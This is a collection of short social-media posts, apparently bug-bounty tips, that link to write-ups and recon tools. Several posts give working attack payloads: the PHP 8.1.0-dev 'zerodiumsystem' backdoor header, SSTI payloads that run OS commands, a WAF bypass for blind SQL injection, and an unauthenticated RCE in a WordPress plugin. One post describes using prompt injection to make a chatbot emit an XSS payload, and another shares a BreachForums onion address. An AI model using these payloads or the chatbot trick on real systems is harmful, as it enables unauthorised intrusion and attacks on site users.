If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli #cybersecurity

🧠 SSTI → Remote Code Execution 1️⃣ App renders user input in template engine 2️⃣ Attacker sends payload: {{7*7}} 3️⃣ Output: 49 → confirms injection 4️⃣ Escalates to: {{self._globals.os.popen('id').read()}} 🎯 Full RCE via template context #bugbounty #ssti #rce #infosec

BreachForums has possibly returned at their original Onion address with what looks like it's original data. I verified the Canary with the PGP and it is valid. http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion

🚨 New Writeup Alert! 🚨 "I Automated CSP Extraction and Mapped 100+ Subdomains" by Ibtissam hammadi is now live on IW! Check it out here: infosecwriteups.com/adf04880ea5d #cybersecurity #infosec #csp #reconnaissance #bugbounty

Looks interesting, will try it today 🤗

XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param

Insecure Direct Object Reference (IDOR) Checklist credit : sylvain prevost #bugbounty #bugbountytips #bughunting #penetrationtesting #pentesting #pentest #ethicalhacking #hacking #cybersecuritytips #cybersecurity #informationsecurity #infosec #bugcrowd #bugbountytips #bugbounty

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ - github.com/MrH0wl/Cloudma… Credit: Md Ismail Šojal 🕷️ #infosec #bugbountytips #Cybersecurity

Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets GitHub: github.com/intigriti/misc…

I just published a new writeup about Authentication Bypass vulnerability on coinmarketcap. 0xbartita.medium.com/how-i-found-an… #bugbountytips #bugbountytip

My New tool s3 ✅ github.com/KingOfBugbount… #bugbounty #bugbountytips #tools #ofjaaah

Define the depth of your crawl with katana's -d flag. The higher the depth, the more recursive crawls and juicy data you get! 🤤 ⚠️ Higher depths can lead to long crawl times against large web applications.

10 common JavaScript coding vulnerabilities Practical code examples.🐞💻 1- Open Redirect 2-SSRF 3-Timing Attacks 4-prototype pollution 5-NoSQLi 6-ReDoS 7-misconfiguration 8-Hard Code Vulnerability 9-mass assignment 10-Host Header Injection #BugBountyTip youtube.com/watch?v=ypNKKY…

💉 Complete Guide: The SQL Injection Knowledge Base Website: websec.ca/kb/sql_injecti… author: Roberto Salgado #infosec

Someone make a subdomains database containing 1.6 billion subdomains scrapped from multiple public (and private) sources. This database is now public and FREE and can be queried on the following website. - dash.pugrecon.celes.in #infosec #cybersec #bugbountytips

JShunter JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug

Unauth RCE in Bricks ≤1.9.6 The /bricks-api/import endpoint allows unauthenticated template imports; attacker-controlled JSON can carry PHP/payloads that the render_element routine processes in an eval‑like manner, resulting in full RCE. #WordPress #RCE #BugBounty

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

🔥SSTI to RCE in URL POC: target.com/docs/1.0/123 = not found target.com/docs/1.0/?123 = now reflecting in source code like /docs/1.0/?123# target.com/docs/1.0/?{{7*7}} = /docs/1.0/?49# ☑️ RCE: /docs/1.0/?{{phpinfo()}} #infosec #bugbounty #bugbountytips